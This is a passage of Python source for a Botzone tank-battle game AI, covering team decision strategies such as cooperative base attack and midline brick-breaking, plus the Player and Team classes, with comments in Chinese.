stopPlayer.set_status(Status.FORCED_STOP_TO_PREVENT_TEAM_HURT) returnActions[stayID] = Action.STAY stopPlayer.set_current_decision(Action.STAY) stopPlayer.set_team_decision(Action.STAY) return returnActions #{ END 'decision/team/prevent_team_hurt.py' }# #{ BEGIN 'decision/team/cut_through_midline.py' }# class CutThroughMidlineTeamDecision(TeamDecisionMaker): """ 当我方队员与敌人在墙后僵持,并且不得不选择等待的时候 考虑是否可以打通土墙,因为这个时候也许可以干扰另一路敌人的进攻路线 """ def _make_decision(self): team = self._team map_ = team._map base = map_.bases[team.side] Tank2Player = type(team.players[0]) returnActions = [ player.get_current_decision() for player in team.players ] for player in team.players: # # 保守起见,先等待一回合 # # TODO: # 有可能延误战机! 5ced7ce1641dd10fdcc776b1 # 这样才是对的 5ced7d66641dd10fdcc777ae # # if not player.has_status_in_previous_turns(Status.HAS_ENEMY_BEHIND_BRICK, turns=1): # continue with outer_label() as OUTER_CONTINUE: action = player.get_current_decision() tank = player.tank battler = player.battler if player.has_team_decision() or player.defeated: continue if (Action.is_stay(action) # 当前回合处于等待状态 and player.has_status(Status.HAS_ENEMY_BEHIND_BRICK) # 墙后有人造成的 and player.has_status(Status.WAIT_FOR_MARCHING) # 因此等待行军 and battler.canShoot # 必须要能够射击 and battler.is_near_midline() # 只有中线附近的队友才会触发这个攻击条件 ): _oppBattler = player.get_risky_enemy() _oppPlayer = Tank2Player(_oppBattler) # 实际考虑的是它的队员! oppPlayer = _oppPlayer.teammate oppBattler = oppPlayer.battler oppTank = oppBattler.tank if oppPlayer.defeated: # 对方已经输了,就不用管了 ... continue x1, y1 = battler.xy dx = np.sign( base.x - x1 ) x2 = x1 + dx y2 = y1 shootAction = Action.get_shoot_action(x1, y1, x2, y2) if battler.will_destroy_a_brick_if_shoot(shootAction): # 将会打掉一个砖块 field = battler.get_destroyed_fields_if_shoot(shootAction)[0] # # 首先判断这一步射击是否会阻止敌人的移动 # enemyAttackingRoute = oppBattler.get_shortest_attacking_route() oppAction = oppBattler.get_next_attacking_action(enemyAttackingRoute) oppRealAction = oppPlayer.try_make_decision(oppAction) if (Action.is_move(oppAction) and Action.is_stay(oppRealAction) and oppPlayer.get_risky_enemy() is battler ): # 敌人下回合打算行军,但是受到我方坦克的影响而停止 continue # 那就算了 # # 判断是否摧毁了敌人进攻路线上的块 # _dx = np.sign( base.x - field.x ) # 首先判断这个块是否和当前坦克处在不同测的地图上 if _dx != 0 and _dx != dx: # _dx == 0 表示 x = 4 中线的墙可以打掉 if field.xy in enemyAttackingRoute: continue # 不要打掉这个块? # # 防止出现我方坦克打掉一个块,对方可以突然出现在 field 前 # for enemyMoveAction in oppBattler.get_all_valid_move_actions(): with map_.simulate_multi_actions((battler, shootAction), (oppBattler, enemyMoveAction)): if oppBattler.destroyed: # 好吧,还是要判断一下这种情况的 ... continue for enemy in oppBattler.get_enemies_around(): if enemy is tank: raise OUTER_CONTINUE # # 现在说明可以射击 # player.set_status(Status.READY_TO_CUT_THROUGH_MIDLINE) returnActions[player.id] = shootAction player.set_team_decision(shootAction) return returnActions #{ END 'decision/team/cut_through_midline.py' }# #{ BEGIN 'decision/team/cooperative_attack.py' }# class CooperativeAttackTeamDecision(TeamDecisionMaker): """ 团队合作拆家策略 ----------------- 案例 ------------ 1. 5ceacbd0811959055e22139d 需要预判 1 步 -> 5cec07f30df42d28e72de8d8 2. 5ce8db66d2337e01c7ab9fae 需要预判 3 步 -> 5cec1a324742030582fad728 3. 5cec9157641dd10fdcc5f30d 重叠进攻时能够分开射击了 4. 5cec9a19641dd10fdcc5ff9f case 3 的另一种实现,提前找到合作路线 5. 5cec9c10641dd10fdcc60254 case 2 的另一种实现 6. 5cec9d01641dd10fdcc6045a 合作与不合作路线相同,但是选择了合作 7. 5cec9d7f641dd10fdcc60556 8. 5ceca04d641dd10fdcc60aed case 2 的另一种实现,但是路线更短,因为将合作触发条件放宽到非严格过中线! 9. 5ceca0ab641dd10fdcc60bb6 将合作条件放宽到非严格过中线可以触发的合作拆家 10. 5ceca21b641dd10fdcc60d4d 11. 5ceca3c3641dd10fdcc61071 12. 5ceca80d641dd10fdcc617e9 13. 5cecabbd641dd10fdcc61d34 14. 5cecfa94641dd10fdcc69661 触发前提 -------------- 在双方均到达对方基地的前提下,假定双方坦克不会再发生交火。在这种情况下,可以认为找到的 最短路线即为实际可走的、不受敌方影响的最短路线。那么可以进行团队合作,寻找一条两人合作下 距离更加短的进攻路线 实现方法 -------------- 下面给出一种简单的实现方法(只预判一回合,更加复杂的情况尚未能实现) 这个策略中存在主攻队员和辅助队员的角色划分。这个并不能在一开始就得出定论,而是要通过判断。 首先,合作拆家所希望达到的效果是,辅助队员帮助主攻队员清除其路线上的土墙,从而减短主攻队员的 攻击路线长度。每清除掉一个土墙,能够减少的路径长度为 2 因此,首先在 delay = 1 的限制条件下,找到其中一个进攻队员所有可能的最短路线。 delay = 1 是允许的, 因为一个土墙的权重是 2 ,打掉 delay = 1 的路线上的一个土墙,可以得到比 delay = 0 的最短路线更加短的路线。 然后考虑另一个进攻队员当前回合所有可能的攻击行为。找到这些攻击行为下能够摧毁掉的 fields ,如果恰好是 位于另一队员攻击路线上的土墙,那么就找到了一条双人合作下的更短路线。 依照上述方法,可以列举出所有可能的最短路线。对这些路线长度进行排序以找到最短的路线,即为团队合作下更优 的一种拆家路线。 补充的更复杂实现 ----------------- 有的时候会出现两个队友攻击路线相同且刚好互相不会影响 5ce8db66d2337e01c7ab9fae ,这种情况下实际上仍然 有机会产生团队合作,但是需要预判 3 步,第一步首先考虑所有可能的进攻行为,第二步按照正常的进攻方向,第三步 再尝试寻找团队更优路线,如果此时可以找到团队合作路线,那么当前回合就先采用第一步的进攻行为。第二步照常进攻 到了第三步的时候就会被上面那种单回合的合作拆家决策找到合作路线。 特判情况 ----------- 1. 考虑这样一种情况,当前两个队友进攻路线长度相同,两者下一步同时攻击一个块,假如让其中一个坦克停止攻击 在下回合可以得到更加短的进攻路线,那么就让这个队员暂时停下来。这种情况通常对应着最后拆基地的几步,一个队员 暂时停下来,让另一个队员拆到前面的墙,然后他下回合马上可以打掉基地,最短路线长度是 2 , 如果双方此时是同时开火的,那么最短路线长度是 3 2. 假设一个队友这回合打掉墙,另一个队友下回合可以到达这个队友身后,下回合前面的队友闪避,后面的队友射击, 那么最短路线长度是 2 ,如果此时前一个队员等待一回合,后面的队员将无法射击,那么最短路线长度将是 3 """ IS_MIDDLE_FIRST = True # 优先中路搜索 IS_X_AXIS_FIRST = True # 优先 x-轴优先搜索 def _find_cooperative_solution(self, attackingPlayer, assistantPlayer): """ 给定 attackingPlayer 和 assistantPlayer ,尝试寻找一种最短的进攻路线 如果有个可行的方案,那么只返回找到的第一个 Return: - solution (attackingPlayer, route, realAction, assistantPlayer, shootAction) / None """ team = self._team map_ = team._map oppBase = map_.bases[1 - team.side] IS_MIDDLE_FIRST = self.__class__.IS_MIDDLE_FIRST IS_X_AXIS_FIRST = self.__class__.IS_X_AXIS_FIRST attackingBattler = attackingPlayer.battler assistantBattler = assistantPlayer.battler for route in attackingBattler.get_all_shortest_attacking_routes(delay=1, middle_first=IS_MIDDLE_FIRST, x_axis_first=IS_X_AXIS_FIRST): for shootAction in assistantBattler.get_all_valid_shoot_actions(): destroyedFields = assistantBattler.get_destroyed_fields_if_shoot(shootAction) if len(destroyedFields) == 1: field = destroyedFields[0] if isinstance(field, BrickField) and field.xy in route: # 拆到了一个队友进攻路线上的土墙 # # 首先考虑打掉的是不是同一个块 # # 打掉同一个块的情况下,当且仅当攻击方已经面向对方基地时有效,否则起不到增加长度的效果 # attackAction = attackingBattler.get_next_attacking_action(route) if Action.is_shoot(attackAction): destroyedFields2 = attackingBattler.get_destroyed_fields_if_shoot(attackAction) if len(destroyedFields2) == 1 and destroyedFields2[0] is field: # 打掉的是同一个块 if not attackingBattler.on_the_same_line_with(oppBase, ignore_brick=True): continue # 只有当攻击方面对对方基地时,才能起到减少路线长度的效果 else: # 否则可以让攻击方这回合等待 realAction = Action.STAY return (attackingPlayer, route, realAction, assistantPlayer, shootAction) realAction = attackingPlayer.try_make_decision(attackAction) if not Action.is_stay(realAction): return (attackingPlayer, route, realAction, assistantPlayer, shootAction) # 找不到,返回 None return None def _make_decision(self): team = self._team map_ = team._map oppBase = map_.bases[1 - team.side] player1, player2 = team.players returnActions = [ player.get_current_decision() for player in team.players ] if player1.defeated or player2.defeated: # 不是两个人就不需要考虑合作了 return returnActions elif ( not player1.battler.is_in_enemy_site(include_midline=True) or not player2.battler.is_in_enemy_site(include_midline=True) ): # 两者必须同时在对方基地,并且是严格的不包含中线 # # 条件放宽了,现在允许包含中线 5cec9e9d641dd10fdcc60783 # return returnActions elif ( player1.has_status(Status.ENCOUNT_ENEMY) or player2.has_status(Status.ENCOUNT_ENEMY) or player1.has_status(Status.WAIT_FOR_MARCHING) or player2.has_status(Status.WAIT_FOR_MARCHING) or player1.has_status(Status.PREVENT_BEING_KILLED) or player2.has_status(Status.PREVENT_BEING_KILLED) ): # 不可以拥有和敌人遭遇战斗相关的状态 return returnActions IS_MIDDLE_FIRST = self.__class__.IS_MIDDLE_FIRST IS_X_AXIS_FIRST = self.__class__.IS_X_AXIS_FIRST # # 不需要判断是否具有团队信号? # # 事实上他碰巧提供了一个很好的案例 5cec9157641dd10fdcc5f30d # 最后一步的时候由于覆盖了 READY_TO_LEAVE_TEAMMATE 的团队策略,使得最后一步合作得以顺利实现! # solutions = [] # -> [ (attackingPlayer, route, realAction, assistantPlayer, shootAction) ] for attackingPlayer, assistantPlayer in [ (player1, player2), (player2, player1) ]: attackingBattler = attackingPlayer.battler assistantBattler = assistantPlayer.battler if not assistantBattler.canShoot: # 当前回合不能进攻,那就无法发起协助了 ... continue _route1 = attackingBattler.get_shortest_attacking_route() _route2 = assistantBattler.get_shortest_attacking_route() minRouteLength = min(_route1.length, _route2.length) # # 攻击方进攻路线长度比辅助方长 2 步以上,那么直接跳过 #-------------------------------------------------------- # 因为单回合决策下至多可以让一个队员的路线长度减 2,如果进攻方比辅助方的攻击路线长 2 步以上,那么 # 一回合内无论如何都不可能让进攻方的路线长度短于辅助方当前回合的最短路线长度,在这种情况下即使可以 # 发生合作,也是没有意义的,甚至可能拖延辅助方的进攻节奏(但是并不能排除可以多回合帮助,然而这个情况 # 非常复杂,所以在此不考虑了) # if _route1.length - _route2.length >= 2: continue solution = self._find_cooperative_solution(attackingPlayer, assistantPlayer) if solution is not None: solutions.append(solution) with map_.auto_revert() as counter: # # 现在往后模拟两回合 5ce8db66d2337e01c7ab9fae # # 第一步随便攻击,第二步按照正常的攻击方向,第三步看是否有合适的攻击路线 # _cachedActions = set() # 缓存已经尝试过的第一步两个方向 for route1 in attackingBattler.get_all_shortest_attacking_routes(delay=1, middle_first=IS_MIDDLE_FIRST, x_axis_first=IS_X_AXIS_FIRST): # 攻击方第一步允许 delay = 1 action1 = attackingBattler.get_next_attacking_action(route1) realAction1 = attackingPlayer.try_make_decision(action1) if Action.is_stay(realAction1): continue for route2 in assistantBattler.get_all_shortest_attacking_routes(middle_first=IS_MIDDLE_FIRST, x_axis_first=IS_X_AXIS_FIRST): action2 = assistantBattler.get_next_attacking_action(route2) realAction2 = assistantPlayer.try_make_decision(action2) if Action.is_stay(realAction2): continue key = (action1, action2) if key in _cachedActions: continue _cachedActions.add(key) with map_.auto_revert() as counter: ## 模拟两步 ## map_.multi_simulate((attackingBattler, action1), (assistantBattler, action2)) counter.increase() # 模拟两步找到路线 solution = self._find_cooperative_solution(attackingPlayer, assistantPlayer) if solution is not None: solutions.append( (attackingPlayer, route1, action1, assistantPlayer, action2) ) continue ## 模拟三步 ## action11 = attackingBattler.get_next_attacking_action() action22 = assistantBattler.get_next_attacking_action() map_.multi_simulate((attackingBattler, action11), (assistantBattler, action22)) counter.increase() # 模拟三步找到路线 solution = self._find_cooperative_solution(attackingPlayer, assistantPlayer) if solution is not None: solutions.append( (attackingPlayer, route1, action1, assistantPlayer, action2) ) continue if len(solutions) > 0: solutions.sort(key=lambda tup: tup[1].length) for attackingPlayer, route, realAction, assistantPlayer, shootAction in solutions: attackingBattler = attackingPlayer.battler assistantBattler = assistantPlayer.battler returnActions[attackingBattler.id] = realAction returnActions[assistantBattler.id] = shootAction attackingPlayer.set_current_attacking_route(route) attackingPlayer.set_current_decision(realAction) attackingPlayer.set_team_decision(realAction) assistantPlayer.set_current_decision(shootAction) assistantPlayer.set_team_decision(shootAction) assistantPlayer.set_status(Status.HELP_TEAMMATE_ATTACK) break return returnActions #{ END 'decision/team/cooperative_attack.py' }# #{ BEGIN 'decision/team/dummy_ending.py' }# class TeamDecisionDummyEnding(TeamDecisionMaker): """ 用于结束 DecisionChain 的结尾 """ def is_handled(self, result): """ 返回 True ,这样 DecisionChain 就会结束 """ return True def make_decision(self): """ 将 player 缓存的结果直接返回 """ team = self._team player1, player2 = team.players action1 = player1.get_current_decision() action2 = player2.get_current_decision() return [ action1, action2 ] #{ END 'decision/team/dummy_ending.py' }# #{ BEGIN 'player.py' }# class Player(DecisionMaker): # 不能处理的情况,返回 Action.INVALID #------------------------------------ # 值得注意的是,由于 Player 仅仅被 team 判断,signal 仅用于玩家与团队间交流,因此团队在判断时, # 不考虑玩家返回的信号,尽管玩家实际返回的值是 (action, signal) # UNHANDLED_RESULT = Action.INVALID def __init__(self, *args, **kwargs): if __class__ is self.__class__: raise NotImplementedError class Tank2Player(Player): _instances = {} # { (side, id): instance } def __new__(cls, tank, map=None, **kwargs): """ 以 (side, id) 为主键,缓存已经创建过的玩家类,使之为 Singleton Input: - tank TankField/BattleTank 第一次必须是 TankField ,之后随意 - map Tank2Map """ key = (tank.side, tank.id) # 只要有这两个属性就可以 obj = __class__._instances.get(key) if obj is None: map_ = map if map_ is None: raise ValueError("map is required at first initialization") if not isinstance(tank, TankField): raise TypeError("tank must be a TankField object at first initialization") obj = object.__new__(cls, **kwargs) __class__._instances[key] = obj obj._initialize(tank, map_) # 使用自定义初始化条件初始化 return obj def __init__(self, tank, map=None): pass def _initialize(self, tank, map): self._tank = tank self._map = map self._battler = BattleTank(tank, map) self._team = None # Tank2Team self._teammate = None # Tank2Player self._opponents = None # [Tank2Player, Tank2Player] self._status = set() # 当前回合的状态,可以有多个,每回合情况 self._labels = set() # 对手给我做的标记,标记后长期有效 self._riskyEnemy = None # 缓存引起潜在风险的敌人 BattleTank self._currentRoute = None # 缓存这回合的攻击路线。这个属性加入较早,只缓存了 marching 逻辑下的路线 self._currentDecision = None # 缓存决策结果,注:每调用一次 make_decision 就会自动修改一次这个结果 self._teamDecision = None # 缓存团队策略 class _SnapshotManager(object): """ 用于管理 player 还原点的创建、选择回滚等行为 --------------------------------------------- 可以为 player 在决策过程中产生的临时变量创建快照,如果在此后又进行了重新决策,但是又不想让这个 决策修改之前决策时留下的临时变量,那么就可以在新的决策前先通过这个类创建一个快照,结束后再通过快照 进行回滚。 关于还原点的创建 ---------------- 1. 对于可能被修改地址指向内存的属性,需要创建一个深拷贝,例如 set, list 类型的属性 2. 对于只是储存引用的属性,那么此处只需要复制引用。这对于采用单例模式设计的类的实例来说是必须的 3. 对于不可变对象,只需进行简单的值复制 """ MUTABLE_ATTRIBUTES = ( "_status", "_labels" ) IMMUTABLE_ATTRIBUTES = ( "_currentDecision", "_teamDecision" ) REFERENCE_ATTRIBUTES = ( "_currentRoute", "_riskyEnemy" ) TEMPORARY_ATTRIBUTES = MUTABLE_ATTRIBUTES + IMMUTABLE_ATTRIBUTES + REFERENCE_ATTRIBUTES def __init__(self): self._snapshot = None self._discarded = False # 是否废弃当前快照,让 player 的状态永久改变 def create_snapshot(self): """ 创建一个快照 由于决策时可能还会更改敌人的状态,所以实际上是给所有人创建快照 """ snapshot = self._snapshot = {} # (side, id) -> attributes for _key, player in Tank2Player._instances.items(): cache = snapshot[_key] = {} for attr, value in player.__dict__.items(): if attr in self.__class__.MUTABLE_ATTRIBUTES: cache[attr] = deepcopy(value) # 创建深拷贝 elif attr in self.__class__.IMMUTABLE_ATTRIBUTES: cache[attr] = value # 复制值 elif attr in self.__class__.REFERENCE_ATTRIBUTES: cache[attr] = value # 复制引用 def restore(self): """ 恢复到还原点的状态 """ if self._discarded: # 保存更改的情况下,不再回滚 return snapshot = self._snapshot for _key, player in Tank2Player._instances.items(): cache = snapshot[_key] for attr in self.__class__.TEMPORARY_ATTRIBUTES: player.__dict__[attr] = cache[attr] def discard_snapshot(self): """ 是否丢弃当前 snapshot,保存变更。 之后如果再调用 restrore,将不会当前 snapshot 还原 player 的状态 """ self._discarded = True def __eq__(self, other): return self.side == other.side and self.id == other.id def __repr__(self): return "%s(%d, %d, %d, %d)" % ( self.__class__.__name__, self.side, self.id, self._tank.x, self._tank.y) def __copy__(self): return self def __deepcopy__(self): # singleton ! return self @property def side(self): return self._tank.side @property def id(self): return self._tank.id @property def defeated(self): return self._tank.destroyed @property def tank(self): return self._tank @property def battler(self): return self._battler @property def team(self): return self._team @property def teammate(self): # -> Tank2Player return self._teammate @property def opponents(self): # -> [Tank2Player, Tank2Player] return self._opponents @contextmanager def create_snapshot(self): """ 创建一个还原点,然后该 player 进行决策,决策完成后回滚 """ try: manager = self.__class__._SnapshotManager() manager.create_snapshot() yield manager # 可以选择不接 snapshot except Exception as e: raise e finally: manager.restore() def set_team(self, team): self._team = team def set_teammate(self, player): # -> Tank2Player assert isinstance(player, Tank2Player) and player.side == self.side self._teammate = player def set_opponents(self, opponents): # -> [Tank2Player] for player in opponents: assert isinstance(player, Tank2Player) and player.side != self.side self._opponents = opponents def get_risky_enemy(self): """ 引起预期行为被拒的敌人,因为该敌人有可能在我方采用预期行为的下一回合将我方击杀 """ return self._riskyEnemy # -> BattleTank def set_risky_enemy(self, enemy): self._riskyEnemy = BattleTank(enemy) # 确保为 BattleTank 对象 def get_current_decision(self): # 返回最后一次决策的结果,用于队员间交流 return self._currentDecision def set_current_decision(self, action): # 用于团队设置队员的当前决策 self._currentDecision = action def get_team_decision(self): # 获得当前的团队决策 return self._teamDecision def has_team_decision(self): return ( self._teamDecision is not None ) def set_team_decision(self, action): # 用于团队设置队员的团队决策 self._teamDecision = action def get_current_attacking_route(self): return self._currentRoute def set_current_attacking_route(self, route): self._currentRoute = route def get_status(self): return self._status def set_status(self, *status): # 添加一个或多个状态 for _status in status: self._status.add(_status) def remove_status(self, *status): # 删除一个或多个状态 for _status in status: self._status.discard(_status) # remove_if_exists def clear_status(self): # 清除所有状态 self._status.clear() def has_status(self, status): # 是否存在某种状态 return status in self._status def get_labels(self): return self._labels def add_labels(self, *labels): # 添加一个或多个标记 for label in labels: self._labels.add(label) def has_label(self, label): # 是否存在某个标记 return label in self._labels def remove_labels(self, *labels): # 删除一个活多个标记 for label in labels: self._labels.discard(label) def clear_labels(self): # 清楚全部标记 self._labels.clear() def has_status_in_previous_turns(self, status, turns=1): return self._team.has_status_in_previous_turns(self, status, turns=turns) def has_status_recently(self, status, turns): return self._team.has_status_recently(self, status, turns) def get_previous_action(self, back=1): return self._team.get_previous_action(self, back) def get_previous_attacking_route(self): return self._team.get_previous_attcking_route(self) def _is_safe_action(self, action): """ 评估该这个决策是否安全 Return: - issafe bool 安全 """ tank = self._tank map_ = self._map battler = self._battler teammate = map_.tanks[tank.side][1 - tank.id] if not map_.is_valid_action(tank, action): # 先检查是否为有效行为 return False if Action.is_stay(action): return True # 移动情况下有一种可能的风险 #-------------------------- # 1. 需要考虑移动后恰好被对方打中 # 2. 移动后恰好遇到两个敌人,假设当前回合敌人不动 # ------------------------- if Action.is_move(action): oppBattlers = [ _player.battler for _player in self._opponents ] riskFreeOpps = [] for oppBattler in oppBattlers: if not oppBattler.canShoot: # 对手本回合无法射击,则不必担心 riskFreeOpps.append(oppBattler) with map_.simulate_one_action(tank, action): # 提交地图模拟情况 if len( battler.get_enemies_around() ) > 1: # 移动后遇到两个敌人 battler1, battler2 = oppBattlers x1, y1 = battler1.xy x2, y2 = battler2.xy if x1 != x2 and y1 != y2: # 并且两个敌人不在同一直线上 self.set_risky_enemy(battler1) # 随便设置一个? return False for oppBattler in oppBattlers: if oppBattler.destroyed: continue elif oppBattler in riskFreeOpps: continue for enemy in oppBattler.get_enemies_around(): if enemy is tank: # 移动后可能会被敌人打中 self.set_risky_enemy(oppBattler) return False # 射击情况下有两种可能的危险 #-------------------------- # 1. 打破一堵墙,然后敌人在后面等着 # 注意区分两个敌人的情况! 5ce92ed6d2337e01c7abf544 # 2. 身边没有闪避的机会,打破一堵墙,对方刚好从旁路闪出来 # 3. 打到队友! 5ce90c6dd2337e01c7abce7a #--------------------------- if Action.is_shoot(action): destroyedFields = battler.get_destroyed_fields_if_shoot(action) if not teammate.destroyed and teammate in destroyedFields: return False # 打到队友当然不安全! with map_.simulate_one_action(battler, action): # 模拟本方行为 # # TODO: # 只模拟一个坦克的行为并不能反映真实的世界,因为敌方这回合很有可能射击 # 那么下回合它就无法射击,就不应该造成威胁 # for oppTank in map_.tanks[1 - tank.side]: if oppTank.destroyed: continue oppBattler = BattleTank(oppTank) for oppAction in oppBattler.get_all_valid_move_actions(): # 任意移动行为 with map_.simulate_one_action(oppBattler, oppAction): # 模拟敌方行为 for field in destroyedFields: if field.xy == oppTank.xy: break # 对方下一步不可能移动到我即将摧毁的 field 上,所以这种情况是安全的 else: for enemy in oppBattler.get_enemies_around(): if enemy is tank: # 敌方原地不动或移动一步后,能够看到该坦克 # 还可以尝试回避 actions = battler.try_dodge(oppBattler) if len(actions) == 0: # 无法回避,危险行为 self.set_risky_enemy(oppBattler) return False return True # 默认安全? def try_make_decision(self, action, instead=Action.STAY): """ 用这个函数提交决策 如果这个决策被判定是危险的,那么将提交 instead 行为 """ if not Action.is_valid(action): return instead elif not self._is_safe_action(action): return instead else: return action def is_safe_to_close_to_this_enemy(self, oppBattler): """ 下回合接近某个敌人是否安全? --------------------------- 用于双方相遇 (且敌人无法射击),我方试图接近他的时候 这种情况下需要判断周围是否有敌人攻击我 """ tank = self._tank map_ = self._map battler = self._battler if oppBattler.canShoot: # 可以射击,必定不安全,还是检查一下 return False action = battler.move_to(oppBattler) if map_.is_valid_move_action(tank, action): for _oppBattler in [ _player.battler for _player in self._opponents ]: # 找到另一个敌人 if _oppBattler.destroyed: # 输了就不算 continue if _oppBattler is oppBattler: # 排除目前这个敌人 continue if not _oppBattler.canShoot: # 本回合不能攻击的不算 continue # 开始模拟,反正就一架坦克 with map_.simulate_one_action(tank, action): for enemy in _oppBattler.get_enemies_around(): if enemy is tank: # 我方坦克将出现在它旁边,并且它可以射击 self.set_risky_enemy(_oppBattler) return False # 可能被偷袭 else: # 此处判断不会被偷袭 return True else: return False # 不能移动,当然不安全 ... def is_safe_to_break_overlap_by_move(self, action, oppBattler): """ 在不考虑和自己重叠的敌人的情况下,判断采用移动的方法打破重叠是否安全 此时将敌人视为不会攻击,然后考虑另一个敌人的攻击 """ tank = self._tank map_ = self._map battler = self._battler if not map_.is_valid_move_action(tank, action): # 还是检查一下,不要出错 return False # 如果移动后有两个敌人在旁边,那么不能前进 5cd3e7a786d50d05a0082a5d #------------------------------------------- with map_.simulate_one_action(tank, action): if len(battler.get_enemies_around()) > 1: #self._riskyEnemy = ?? return False _oppBattlers = [ _player.battler for _player in self._opponents ] for _oppBattler in _oppBattlers: if _oppBattler.destroyed: # 跳过已经输了的 continue if not _oppBattler.canShoot: # 另一个对手不能射击 continue if _oppBattler is oppBattler: # 不考虑和自己重叠的这个坦克 continue with map_.simulate_one_action(tank, action): # 提交模拟 for enemy in _oppBattler.get_enemies_around(): if enemy is tank: # 不安全,可能有风险 self.set_risky_enemy(_oppBattler) return False else: return True # 否则是安全的 def is_suitable_to_overlap_with_enemy(self, oppBattler): """ 当两者均没有炮弹,然后中间相差一格时,冲上去和敌方坦克重叠是否合适? WARNING: ------------ 1. 该函数仅适用于两者间移动路劲长度为 2 的情况,其他情况不适用 2. 该函数判定为 False 的情况,表示适合堵路,不适合重叠,但是判定为 False 并不表示一定要冲上去重叠,而是要根据当时的具体情况来判断 """ tank = self._tank map_ = self._map battler = self._battler _route = battler.get_route_to_enemy_by_move(oppBattler) assert _route.length == 2 action = oppBattler.move_to(battler) if map_.is_valid_move_action(oppBattler, action): # # 检查自己所处的位置是否是敌人必经之路 # 如果是,那么就堵路 # originRoute = oppBattler.get_shortest_attacking_route() blockingRoute = oppBattler.get_shortest_attacking_route( # 将我方坦克设为 Steel ignore_enemies=False, bypass_enemies=True) if originRoute.is_not_found(): # 不大可能,但是检查一下 return False if blockingRoute.is_not_found(): # 直接就走不通了,当然非常好啦 return False if blockingRoute.length - originRoute.length > 1: # 认为需要多打破一个以上土墙的情况叫做原路 return False return True # @override def make_decision(self, signal=Signal.NONE): """ 预处理: ------------------ - 清除所有旧有状态 - 清除可能的风险敌人 - 统一处理回复格式 注意: ------------------ - 申明为 _make_decision 过程中的缓存变量,必须在下一次决策前预先清除 """ self.clear_status() # 先清除所有的状态 self._riskyEnemy = None # 清楚所有缓存的风险敌人 res = self._make_decision(signal) if isinstance(res, (tuple, list)) and len(res) == 2: returnSignal = res[1] action = res[0] else: if signal != Signal.NONE: # 说明没有回复团队信号 returnSignal = Signal.UNHANDLED else: returnSignal = Signal.INVALID action = res self._currentDecision = action # 缓存决策 return ( action, returnSignal ) def _make_decision(self, signal): player = self battler = player.battler if player.defeated: player.set_status(Status.DIED) return self.__class__.UNHANDLED_RESULT if not battler.canShoot: player.set_status(Status.RELOADING) if battler.is_face_to_enemy_base(): player.set_status(Status.FACING_TO_ENEMY_BASE) if (not player.has_label(Label.DONT_WITHDRAW) and player.has_label(Label.KEEP_ON_WITHDRAWING) and WithdrawalDecision.ALLOW_WITHDRAWAL ): player.remove_status(Status.AGGRESSIVE, Status.DEFENSIVE, Status.STALEMENT) player.set_status(Status.WITHDRAW) # 先保持着 这个状态 decisions = DecisionChain( LeaveTeammateDecision(player, signal), AttackBaseDecision(player, signal), EncountEnemyDecision(player, signal), OverlappingDecision(player, signal), BaseDefenseDecision(player, signal), BehindBrickDecision(player, signal), FollowEnemyBehindBrickDecision(player, signal), WithdrawalDecision(player, signal), ActiveDefenseDecision(player, signal), MarchingDecision(player, signal), ) res = decisions.make_decision() if decisions.is_handled(res): return res return self.__class__.UNHANDLED_RESULT #{ END 'player.py' }# #{ BEGIN 'team.py' }# class Team(DecisionMaker): UNHANDLED_RESULT = [ Action.STAY, Action.STAY ] # 实际上不可能碰到 team 不能决策的情况,否则找谁决策呀 ... def __init__(self, *args, **kwargs): if __class__ is self.__class__: raise NotImplementedError class Tank2Team(Team): def __init__(self, side, player1, player2, map): player1.set_team(self) player2.set_team(self) self._side = side self._map = map self._player1 = player1 self._player2 = player2 self._opponentTeam = None self._memory = {} # 团队记忆 self._previousActions = [] # 历史行为 @property def side(self): return self._side @property def players(self): return [ self._player1, self._player2 ] def load_memory(self, memory): """ botzone 将 data 传入给 team 恢复记忆 """ if memory is None: memory = { "status": [], # [ set(), set() ] 每轮的状态 "labels": [ set(), set() ], # [ set(), set() ] 已有的标记 "previousRoute": [ None, None ] # [ Route, Route ] } self._memory = memory self._player1.add_labels(*memory["labels"][0]) self._player2.add_labels(*memory["labels"][1]) def dump_memory(self): memory = self._memory memory["status"].append([ self._player1.get_status(), self._player2.get_status(), ]) memory["labels"] = [ self._player1.get_labels(), self._player2.get_labels(), ] memory["previousRoute"] = [ self._player1.get_current_attacking_route(), self._player2.get_current_attacking_route(), ] return memory def get_memory(self): return self._memory def set_previous_actions(self, previousActions): """ 由 botzone input 获得的过去动作,可以将其视为一种记忆 """ self._previousActions = previousActions def set_opponent_team(self, team): """ 设置对手团队 Input: - team Tank2Team """ assert isinstance(team, self.__class__) self._opponentTeam = team def has_status_in_previous_turns(self, player, status, turns=1): """ 在曾经的一定回合里,某玩家是否拥有某个状态 Input: - player Player 玩家实例,不一定是本队的 - status int 状态编号 - turns int 向前检查多少回合 """ team = player.team memory = team.get_memory() allStatus = memory["status"] if len(allStatus) == 0: return False # TODO: # 还需要判断回合数是否超出一已知回合? for turn in range( len(allStatus) - 1 , len(allStatus) - 1 - turns, -1 ): # 逆序 try: previousStatus = allStatus[turn][player.id] except IndexError: # 可能 allStatus 为空 return False if previousStatus is None: return False elif status not in previousStatus: return False else: return True def has_status_recently(self, player, status, turns): """ 最近的几回合内是否曾经拥有过某个状态 """ team = player.team memory = team.get_memory() allStatus = memory["status"] if len(allStatus) == 0: return False for turn in range( len(allStatus) - 1 , len(allStatus) - 1 - turns, -1 ): try: previousStatus = allStatus[turn][player.id] if status in previousStatus: return True except IndexError: return False else: return False def get_previous_action(self, player, back=1): """ 获得一个玩家的操纵坦克的历史行为 Input: - player Player 玩家实例,不一定是本队的 - back int ( >= 1) 前第几回合的历史记录,例如 back = 1 表示前一回合 """ assert back >= 1, "back >= 1 is required" return self._previousActions[player.id][-back] def get_previous_attcking_route(self, player): return self._memory[player.id] def _make_decision(self): """ 团队决策 Return: - actions [int, int] 0, 1 号玩家的决策 """ team = self # 假装先让对方以自己的想法决策 #------------------------------- # 分析对方的行为,可以对下一步的行为作出指导 # for oppPlayer in self._opponentTeam.players: oppPlayer.make_decision() decisions = DecisionChain( IndividualTeamDecision(team), VitalTeamDecision(team), LeaveTeammateTeamDecision(team), ForcedAttackTeamDecision(team), BreakBrickTeamDecision(team), BackToHelpTeamDecision(team), CutThroughMidlineTeamDecision(team), CooperativeAttackTeamDecision(team), PreventTeamHurtTeamDecision(team), TeamDecisionDummyEnding(team), ) res = decisions._make_decision() # for func in [ find_all_routes_for_shoot, find_all_routes_for_move ]: # if not hasattr(func, "__wrapped__"): # continue # _wrapper = func.__wrapped__ # if hasattr(_wrapper, "__memory__"): # _memory = 